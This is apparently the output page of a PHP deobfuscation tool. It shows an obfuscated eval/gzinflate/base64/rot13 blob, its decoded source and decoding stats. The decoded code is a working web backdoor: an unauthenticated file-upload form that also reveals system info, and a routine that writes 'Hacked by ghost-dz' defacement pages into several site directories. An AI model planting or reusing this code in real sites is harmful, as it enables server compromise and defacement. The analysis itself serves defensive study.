Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval (gzinflate(base64_decode(str_rot13("eIAgn9fjRC68DC7QEDhGQH3pSDcwvp3TnYqOLLA2a0bVfvmob..

Decoded Output download

if ( isset($_GET['up']) )
{
echo '<b>by ghost-dz<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload ok :d !!!</b><br><br>'; }
	else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
exit;
}

if ( isset($_GET['ghz']) )
{
chdir('..'); chdir('..'); $path = getcwd();
$xxx = 
'<html>
<head>
<meta http-equiv="Content-Language" content="fr">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Hacked by ghost-dz</title>
</head>
<body bgcolor="#000000">
<p align="center">&nbsp;</p>
<p align="center">&nbsp;</p>
<p align="center"><font size="8" color="#FFFFFF">Hacked by ghost-dz</font></p>
<p align="center"><font size="8" color="#FF0000">Algerian Hacker</font></p>
</body>
</html>'; 
$fff = fopen($path.'/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
$fff = fopen($path.'/tmp/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
$fff = fopen($path.'/logs/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
$fff = fopen($path.'/images/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
$fff = fopen($path.'/cache/gh.html', 'w'); fwrite($fff, $xxx); fclose($fff);
exit;
}

Did this file decode correctly?

Original Code

eval (gzinflate(base64_decode(str_rot13("eIAgn9fjRC68DC7QEDhGQH3pSDcwvp3TnYqOLLA2a0bVfvmobeXy2KYmZiosq7XnYg3PLPKTkgX9CUr655UZVDQMgfVT4+KUv5go2uz6PPRpQa4ZO4XKTht8GqVASXIh7FGomgZzpE+qzgVfh5cIVtvagQqUnHWaw2z5
ovct3Rcqk4ENWJlcf5tLkPRtnz43EfFx6cFIuwH2piTGwSyTjXUTcQAXf0j0OTF2g9hiVJiGJsOVhIEvy+eKeqmv+ilHWN+O3eyRXCXD1UMcWn2i4B33GUKb+AnKj8l+e76zmNZLY79+hpLkhIv6tQvTKFFRtPA7tHUihQLoaBsy56hY61idrdTYJ2bef3DA0ZHW/BK0wuNk4UUdUuw
0UomALQDnhsx+wa8TC7TnHX04xUYWcQdptn9LFmieI+5Vs/WsyAisNhOyWchNGdp0aZTGmqtjJ0VZuoO8yDHuNb7K6mInutZ6Y22yxhStKtdJhG9lm6P01xmR907rk+FQed2b7rFX1HKUPhFXrjgFujm/X+HTrqfYg2WgV1sCAptnCRz8xaJzI+3x9qa5JL9ycIHv+pG4aputK8hE92
OVgTf11qxT0bWecMhLiQmgak7SNSBlDP1mYBk0+XcBJmBoE+LMKejqgK0D6Og3US/hfa/VjI5qEiYsrY7996bDwJD19ZQAH7QVaqxCjsTTDxRl8mkUZaAgEO30MR9cIWEGS0SCtX6pPCWIV60VKPkXThy3Ad506229XN7u4R04TcoFEKf0ZSzuSb8UkkxikKCDqys0Sj=="))));

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 0b070a287e22261f8b9e921382da504f
Eval Count 1
Decode Time 80 ms